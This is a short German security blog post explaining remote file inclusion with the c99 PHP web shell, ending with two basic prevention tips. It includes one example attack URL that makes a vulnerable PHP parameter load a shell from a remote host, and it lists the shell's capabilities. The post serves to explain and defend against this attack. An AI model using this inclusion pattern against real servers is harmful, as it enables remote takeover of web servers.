BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) und Bots

Webserver Hacken – Remote File Inclusion (c99 php shell)

Remote File Inclusion - c99 php shell

Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist.
Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber HIER

Daher will ich mich heute mit der wohl am bekanntesten "PHP SHELL" (c99) beschäftigen.
Es ist natürlich verständlich, dass ich den Quellcode der c99 PHP Shell ein wenig bearbeiten musste, damit man diese
nicht sofort benutzen kann.

Zunächst einmal ist zu sagen, diese Shell muss nicht unbedingt auf dem eigenen Webserver liegen um genutzt zu werden.
Es reicht wenn diese auf einem anderen Webserver in reiner Textform abgelegt ist.

Ein klassisches Angriffsmuster sieht wie folgt aus:

http://der.zu.hackende.server.de/ungeschütze.variable.php?variable=http://pfad.zur.phpShell.de/c99

Wenn dieser Angriff erfolgreich war, wird folgendes Angezeigt: (Beispiel)

Mit dieser nun integrierten Shell, kann man nun den gesamten Webserver steuern.

Folgendes ist mit diesem Tool möglich:

• FTP-Upload
• Brute Force Attacken
• Upload Files
• SQL
• Webserver Informationen anzeigen

Wie kann ich dem ganzen vorbeugen:

1. Halten Sie Ihren Server und die Software (Joomla,etc) immer auf dem aktuellsten Stand.
2. Überprüfen Sie öfters die Webserver Logdateien auf ungewöhnliche Einträge.